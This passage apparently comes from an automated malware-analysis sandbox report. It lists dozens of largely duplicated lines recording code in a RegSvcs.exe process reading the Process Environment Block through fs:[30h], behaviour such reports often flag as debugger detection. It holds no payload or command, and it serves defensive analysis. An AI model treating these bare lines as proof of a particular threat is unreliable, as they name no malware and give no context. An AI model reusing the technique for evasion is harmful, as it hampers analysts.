      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h]1_2_0131A309
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]1_2_01323B7A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h]1_2_01323B7A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FDB60 mov ecx, dword ptr fs:[00000030h]1_2_012FDB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8B58 mov eax, dword ptr fs:[00000030h]1_2_013C8B58
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FDB40 mov eax, dword ptr fs:[00000030h]1_2_012FDB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FF358 mov eax, dword ptr fs:[00000030h]1_2_012FF358
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C5BA5 mov eax, dword ptr fs:[00000030h]1_2_013C5BA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]1_2_01324BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]1_2_01324BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h]1_2_01324BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132B390 mov eax, dword ptr fs:[00000030h]1_2_0132B390
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322397 mov eax, dword ptr fs:[00000030h]1_2_01322397
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B138A mov eax, dword ptr fs:[00000030h]1_2_013B138A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]1_2_0132138B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]1_2_0132138B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132138B mov eax, dword ptr fs:[00000030h]1_2_0132138B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AD380 mov ecx, dword ptr fs:[00000030h]1_2_013AD380
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]1_2_01301B8F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h]1_2_01301B8F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h]1_2_013203E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131DBE9 mov eax, dword ptr fs:[00000030h]1_2_0131DBE9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]1_2_013A23E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h]1_2_013A23E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A23E3 mov eax, dword ptr fs:[00000030h]1_2_013A23E3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]1_2_013753CA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013753CA mov eax, dword ptr fs:[00000030h]1_2_013753CA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h]1_2_0131B236
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]1_2_0131A229
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]1_2_01334A2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]1_2_01334A2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01313A1C mov eax, dword ptr fs:[00000030h]1_2_01313A1C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]1_2_012FAA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]1_2_012FAA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308A0A mov eax, dword ptr fs:[00000030h]1_2_01308A0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]1_2_012F5210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133927A mov eax, dword ptr fs:[00000030h]1_2_0133927A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]1_2_013AB260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]1_2_013AB260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h]1_2_013C8A62
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h]1_2_013BEA55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]1_2_012F9240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01384257 mov eax, dword ptr fs:[00000030h]1_2_01384257
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]1_2_0130AAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]1_2_0130AAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h]1_2_0132FAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]1_2_012F52A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]1_2_0132D294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]1_2_0132D294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]1_2_013B4AEF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h]1_2_01322AE4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h]1_2_01322ACB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h]1_2_0137A537
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h]1_2_013BE539
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]1_2_01303D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h]1_2_013C8D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]1_2_01324D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h]1_2_012FAD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]1_2_0131C577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]1_2_0131C577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h]1_2_01317D50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h]1_2_01333D43
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373540 mov eax, dword ptr fs:[00000030h]1_2_01373540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h]1_2_013A3D40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]1_2_01321DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]1_2_013C05AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]1_2_013C05AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h]1_2_013235A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]1_2_012F2D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]1_2_0132FD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]1_2_0132FD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]1_2_01322581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]1_2_013B2D82
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h]1_2_013A8DF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]1_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]1_2_0130D5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]1_2_013BFDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]1_2_01376DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h]1_2_0132BC2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]1_2_013C740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
